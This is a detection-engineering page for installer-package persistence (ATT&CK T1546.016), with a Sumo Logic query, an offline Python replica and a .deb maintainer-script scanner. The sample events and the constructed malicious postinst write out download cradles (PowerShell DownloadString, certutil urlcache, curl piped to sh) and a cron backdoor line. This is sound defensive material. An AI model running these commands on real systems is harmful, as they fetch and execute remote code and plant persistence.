T1546.016 Sumo Logic CSE · Sumo

Detect Installer Packages in Sumo Logic CSE

Adversaries may establish persistence and elevate privileges by using an installer package to execute malicious content. Installer packages are OS-specific bundles (Windows MSI, macOS .pkg, Linux .deb and .rpm) that carry an application together with the scripts the platform's installer runs around it, and they can be distributed through legitimate channels such as vendor download sites and package repositories. The installer utility that unpacks the bundle (msiexec.exe for MSI, the macOS installer command or Installer.app for .pkg, dpkg/rpm and their front ends apt and yum on Linux) executes pre-install and post-install scripts, MSI custom actions and package maintainer scripts. Because installation normally runs as SYSTEM or root, those scripts execute arbitrary code with elevated privileges during the installation process. Malicious code within the package can then establish persistence by deploying backdoors as scheduled tasks, services, cron entries, launch daemons or startup items.

MITRE ATT&CK

Tactic
Privilege Escalation, Persistence
Technique
T1546 Event Triggered Execution
Sub-technique
T1546.016 Installer Packages
Canonical reference
https://attack.mitre.org/techniques/T1546/016/

Sumo Detection Query

Sumo Logic CSE (Sumo)
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*linux* OR _sourceCategory=*macos*)
| parse regex "(?<![A-Za-z])EventID=(?<EventID>\d+)" nodrop
| parse regex "(?<![A-Za-z])(?:ParentImage|ParentProcessName|ParentProcessPath)=(?<ParentProcess>[^\n\r]+)" nodrop
| parse regex "(?<![A-Za-z])(?:Image|NewProcessName|ProcessPath|CommandPath)=(?<ChildProcess>[^\n\r]+)" nodrop
| parse regex "(?<![A-Za-z])(?:CommandLine|NewProcessCommandLine|ProcessCommandLine)=(?<CommandLine>[^\n\r]+)" nodrop
| toLowerCase(ParentProcess) as parent
| toLowerCase(ChildProcess) as child
| toLowerCase(CommandLine) as cmd
| where parent matches /(^|\W)(msiexec(\.exe)?|installer|pkgutil|dpkg|rpm|yum|apt(-get)?|choco(latey)?(\.exe)?|winget(\.exe)?)$/
| where child matches /(^|\W)(powershell|pwsh|cmd|wscript|cscript|mshta|certutil|bitsadmin|bash|sh|python[0-9.]*)(\.exe)?$/
    OR cmd matches /invoke-webrequest|downloadstring|net\.webclient|-encodedcommand|certutil.*urlcache|bitsadmin.*transfer/
| if(cmd matches /invoke-webrequest|downloadstring|net\.webclient/ AND child matches /(^|\W)(powershell|pwsh|cmd|bash|sh)(\.exe)?$/,
    "INSTALLER_DOWNLOAD_CRADLE",
    if(cmd matches /-encodedcommand|certutil.*urlcache|bitsadmin.*transfer/,
      "INSTALLER_ENCODED_EXECUTION",
      if(child matches /(^|\W)(powershell|pwsh|cmd|wscript|cscript|bash|sh|python[0-9.]*)(\.exe)?$/,
        "INSTALLER_SCRIPT_CHILD",
        "INSTALLER_SUSPICIOUS_ACTIVITY"))) as DetectionType
| fields _messageTime, _sourceHost, EventID, DetectionType, ChildProcess, CommandLine, ParentProcess
| sort by _messageTime desc
Severity: high. Confidence: medium.

Sumo Logic query that extracts the parent process, child process and command line from key=value process-creation fields (Sysmon Event ID 1 and Security Event ID 4688 as forwarded by the Windows collector) and fires when an installer or package-manager parent spawns a script interpreter, or when the child's command line carries a download cradle, an encoded command, or a certutil/bitsadmin transfer. The parse regex lines expect one field per line, and the negative lookbehind keeps `Image=` from matching inside `ParentImage=` (and `CommandLine=` inside `ParentCommandLine=`); the process patterns are anchored to the end of the path so that a fragment such as `rpm` no longer matches any path that happens to contain those letters. Linux auditd (`exe=`, `comm=`, `ppid=`) and the macOS unified log use different field names, so the `*linux*` and `*macos*` source categories only contribute if those sources are normalised to the same keys upstream or the parse lines are extended for them.
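The query above only runs inside Sumo Logic. As an added example (not code from the page or from Sumo Logic), the following Python reproduces its parse-and-classify logic so the matching can be exercised offline over constructed sample events in the one-field-per-line key=value layout the parse regex lines expect. The host, paths, command lines and the TEST-NET-3 address 203.0.113.10 are constructed; the installer and interpreter lists are the query's, extended with dnf, dash and curl/wget as an assumption.

```python
import re

# Constructed sample events (not real telemetry) in the one-field-per-line
# key=value layout that the query's parse regex lines expect. Paths, hosts and
# command lines are made up; 203.0.113.10 is a TEST-NET-3 address.
SAMPLE_EVENTS = [
    # 1: MSI custom action launching a PowerShell download cradle (Sysmon names)
    "EventID=1\n"
    "ParentImage=C:\\Windows\\System32\\msiexec.exe\n"
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
    "CommandLine=powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/p.ps1')\"\n"
    "ParentCommandLine=msiexec.exe /i C:\\Users\\a\\setup.msi /qn",
    # 2: same behaviour with Security 4688 field names and an encoded command
    "EventID=4688\n"
    "ParentProcessName=C:\\Windows\\System32\\msiexec.exe\n"
    "NewProcessName=C:\\Windows\\System32\\cmd.exe\n"
    "NewProcessCommandLine=cmd.exe /c powershell -EncodedCommand SQBFAFgA",
    # 3: dpkg running a maintainer script, the benign hit the tuning notes describe
    "EventID=1\n"
    "ParentImage=/usr/bin/dpkg\n"
    "Image=/bin/bash\n"
    "CommandLine=/bin/bash /var/lib/dpkg/info/libfoo.postinst configure",
    # 4: winget spawning certutil to fetch a file
    "EventID=1\n"
    "ParentImage=C:\\Users\\a\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe\n"
    "Image=C:\\Windows\\System32\\certutil.exe\n"
    "CommandLine=certutil.exe -urlcache -split -f http://203.0.113.10/x.exe x.exe",
    # 5: unrelated process tree that must not match
    "EventID=1\n"
    "ParentImage=C:\\Windows\\explorer.exe\n"
    "Image=C:\\Windows\\System32\\notepad.exe\n"
    "CommandLine=notepad.exe",
]

# Field extraction mirrors the query's parse regex lines. The negative lookbehind
# stops "Image=" matching inside "ParentImage=" and "CommandLine=" inside
# "ParentCommandLine=", which an unanchored pattern would do.
FIELD_PATTERNS = {
    "EventID": re.compile(r"(?<![A-Za-z])EventID=(?P<v>\d+)"),
    "ParentProcess": re.compile(r"(?<![A-Za-z])(?:ParentImage|ParentProcessName|ParentProcessPath)=(?P<v>[^\r\n]+)"),
    "ChildProcess": re.compile(r"(?<![A-Za-z])(?:Image|NewProcessName|ProcessPath|CommandPath)=(?P<v>[^\r\n]+)"),
    "CommandLine": re.compile(r"(?<![A-Za-z])(?:CommandLine|NewProcessCommandLine|ProcessCommandLine)=(?P<v>[^\r\n]+)"),
}

# Matched with fullmatch against the lower-cased basename of the image path, so a
# fragment such as "rpm" cannot hit an arbitrary path that contains those letters.
INSTALLER_PARENT = re.compile(r"(msiexec|installer|pkgutil|dpkg|rpm|yum|dnf|apt|apt-get|choco|chocolatey|winget)(\.exe)?")
SCRIPT_CHILD = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|certutil|bitsadmin|bash|sh|dash|python[\d.]*)(\.exe)?")
SHELL_CHILD = re.compile(r"(powershell|pwsh|cmd|bash|sh|dash)(\.exe)?")
CRADLE = re.compile(r"invoke-webrequest|downloadstring|net\.webclient|\biwr\b|\bcurl\b|\bwget\b")
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\b|certutil.*urlcache|bitsadmin.*transfer|base64\s+(?:-d|--decode)")


def parse_event(raw):
    """Return the query's extracted fields; a missing field is "" (the nodrop case)."""
    fields = {}
    for name, pattern in FIELD_PATTERNS.items():
        m = pattern.search(raw)
        fields[name] = m.group("v").strip() if m else ""
    return fields


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def classify(raw):
    """Apply the query's where/if logic; returns a result row or None when it would not fire."""
    f = parse_event(raw)
    parent, child, cmd = basename(f["ParentProcess"]), basename(f["ChildProcess"]), f["CommandLine"].lower()
    if not INSTALLER_PARENT.fullmatch(parent):
        return None
    script_child = bool(SCRIPT_CHILD.fullmatch(child))
    if not (script_child or CRADLE.search(cmd) or ENCODED.search(cmd)):
        return None
    if CRADLE.search(cmd) and SHELL_CHILD.fullmatch(child):
        kind = "INSTALLER_DOWNLOAD_CRADLE"
    elif ENCODED.search(cmd):
        kind = "INSTALLER_ENCODED_EXECUTION"
    elif script_child:
        kind = "INSTALLER_SCRIPT_CHILD"
    else:
        kind = "INSTALLER_SUSPICIOUS_ACTIVITY"
    return {"EventID": f["EventID"], "DetectionType": kind, "ParentProcess": f["ParentProcess"],
            "ChildProcess": f["ChildProcess"], "CommandLine": f["CommandLine"]}


def run(events):
    """Classify a batch of raw events and keep only the rows the query would return."""
    return [row for row in map(classify, events) if row is not None]


if __name__ == "__main__":
    for row in run(SAMPLE_EVENTS):
        print(f"{row['DetectionType']:<30} {basename(row['ParentProcess'])} -> {basename(row['ChildProcess'])}")
```

Event 3 is deliberately the dpkg maintainer-script case from the tuning notes: it classifies as INSTALLER_SCRIPT_CHILD, which is where an allowlist on the script path (here /var/lib/dpkg/info/) or on the package name belongs.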

Data Sources

  • Windows Event Logs via Sumo Logic Windows Agent (Sysmon EventID 1, Security EventID 4688)
  • Linux auditd via Sumo Logic Installed Collector
  • macOS Unified Logs via Sumo Logic macOS Agent

Required Tables

  • _sourceCategory=*windows*
  • _sourceCategory=*sysmon*
  • _sourceCategory=*linux*
  • _sourceCategory=*macos*

False Positives & Tuning

  • Software vendors embedding PowerShell or shell scripts in MSI/pkg post-install phases for legitimate product configuration — for example, antivirus kernel extension registration or IDE plugin setup
  • Linux dpkg and rpm maintainer scripts (postinst, preinst, postrm) executing bash commands as a standard part of package management, particularly for system packages that modify init scripts or cron entries
  • macOS .pkg installers running post-install shell scripts to move application bundles, create symlinks in /usr/local/bin, or write launch daemon plists as part of normal app setup
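When one of these alerts fires for dpkg or apt, the package's own maintainer scripts are the first thing to read, since they are exactly the pre- and post-install code the technique description above relies on and the source of the false positives listed here. The following is an added example, not code from the page or from Sumo Logic: a pure-Python triage scanner that unpacks a .deb (an ar archive holding control.tar.*), reads its preinst/postinst/prerm/postrm scripts and flags lines worth a human look. The indicator list is an assumption for illustration; hits on cron or systemd paths are review signals rather than verdicts, because legitimate packages write there too. The two packages it scans are constructed inline (the 203.0.113.10 address is TEST-NET-3) and never installed.

```python
import io
import posixpath
import re
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Triage indicators (an assumed list for illustration, not from any vendor rule).
# persistence_path is a review signal: legitimate packages write cron and unit files too.
INDICATORS = [
    ("download_pipe_to_shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da|z)?sh\b", re.I)),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|--decode)\b", re.I)),
    ("background_process", re.compile(r"\b(nohup|setsid|disown)\b", re.I)),
    ("persistence_path", re.compile(r"/etc/(cron\.d|cron\.(hourly|daily|weekly|monthly)|crontab|rc\.local|systemd/system)\b", re.I)),
]


def ar_members(blob):
    """Yield (name, data) for each member of a classic ar archive, the .deb container."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    off = len(AR_MAGIC)
    while off + 60 <= len(blob):
        hdr = blob[off:off + 60]           # 16 name, 12 mtime, 6 uid, 6 gid, 8 mode, 10 size, 2 magic
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[:16].decode("ascii").rstrip(" ").rstrip("/")   # GNU ar appends "/"
        size = int(hdr[48:58].decode("ascii").strip())
        yield name, blob[off + 60:off + 60 + size]
        off += 60 + size + (size % 2)      # member data is padded to an even offset


def scan_deb(blob):
    """Return (script, line_no, indicator) for every indicator hit in the maintainer scripts."""
    findings = []
    for name, data in ar_members(blob):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for member in tf.getmembers():
                script = posixpath.basename(member.name)
                if script not in MAINTAINER_SCRIPTS or not member.isfile():
                    continue
                text = tf.extractfile(member).read().decode("utf-8", "replace")
                for line_no, line in enumerate(text.splitlines(), 1):
                    for label, pattern in INDICATORS:
                        if pattern.search(line):
                            findings.append((script, line_no, label))
    return findings


# --- constructed test packages; nothing below is a real package ------------------

def make_tar(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o755
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def ar_pack(members):
    out = bytearray(AR_MAGIC)
    for name, data in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        out += data + (b"\n" if len(data) % 2 else b"")
    return bytes(out)


def build_deb(control_files):
    return ar_pack([("debian-binary", b"2.0\n"),
                    ("control.tar.gz", make_tar(control_files)),
                    ("data.tar.gz", make_tar({}))])


CONTROL = "Package: sample\nVersion: 1.0\nArchitecture: all\nMaintainer: nobody\nDescription: constructed sample\n"
BENIGN_CONTROL = {"./control": CONTROL, "./postinst": (
    "#!/bin/sh\nset -e\nif [ \"$1\" = \"configure\" ]; then\n"
    "    ldconfig\n    update-alternatives --install /usr/bin/sample sample /usr/lib/sample/sample 10\nfi\n")}
MALICIOUS_CONTROL = {"./control": CONTROL, "./postinst": (
    "#!/bin/sh\nset -e\nldconfig\n"
    "# constructed indicator lines; 203.0.113.10 is a TEST-NET-3 address\n"
    "curl -fsSL http://203.0.113.10/stage2.sh | sh\n"
    "echo 'ZWNobyBoaQ==' | base64 -d | sh\n"
    "echo '* * * * * root /usr/local/lib/.helper' > /etc/cron.d/helper\n")}

if __name__ == "__main__":
    for label, control in (("benign", BENIGN_CONTROL), ("malicious", MALICIOUS_CONTROL)):
        print(label, scan_deb(build_deb(control)))
```

The benign package, which only runs ldconfig and update-alternatives in its postinst, produces no findings; the constructed malicious one yields one finding per indicator line. On a real host the same function can be pointed at the cached archive under /var/cache/apt/archives/ for the package named in the alert.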

Testing Methodology

Validate this detection with the three tests below, modelled on Atomic Red Team. Each lists the behaviour to exercise and the telemetry you should expect to see; executable commands and cleanup steps are not reproduced on this page.

  1. Test 1: MSI Custom Action Spawning PowerShell

    Expected signal: Process creation for msiexec.exe, followed by process creation for powershell.exe with msiexec.exe as its parent. The parent-child relationship (msiexec -> powershell) combined with the PowerShell command-line arguments is the detection trigger; depending on the command line the event classifies as INSTALLER_DOWNLOAD_CRADLE or INSTALLER_SCRIPT_CHILD.

  2. Test 2: Package Manager Post-Install Script with Network Call

    Expected signal: Process creation for pip (pip install), a python child executing the setup.py post-install hook, and a curl child carrying the callback URL. The pip -> python -> curl chain is the detection signal. Note that neither pip nor python is in the query's installer-parent pattern, so as written the query will not fire on this chain; add the package manager you test with to that pattern first.

  3. Test 3: MSI Silent Installation with Custom Action Tracking

    Expected signal: Process creation for msiexec.exe, or for cmd.exe spawned from the installer context. File creation for custom_action_test.txt. Windows Installer (MsiInstaller) entries in the Application event log recording the custom action execution.
